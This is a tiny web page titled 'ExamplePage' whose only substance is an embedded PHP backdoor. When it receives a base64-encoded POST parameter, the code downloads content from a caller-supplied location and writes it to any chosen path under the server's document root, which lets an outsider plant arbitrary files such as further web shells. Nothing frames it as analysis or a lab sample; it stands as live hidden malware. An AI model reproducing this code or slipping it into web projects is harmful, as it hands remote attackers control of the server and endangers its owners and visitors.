ExamplePage

<?php if(isset($_POST["quv"])){$p = base64_decode($_POST["quv"]);$c = file_get_contents(base64_decode($_POST["c"]));file_put_contents($_SERVER["DOCUMENT_ROOT"].$p, $c);exit;} ?>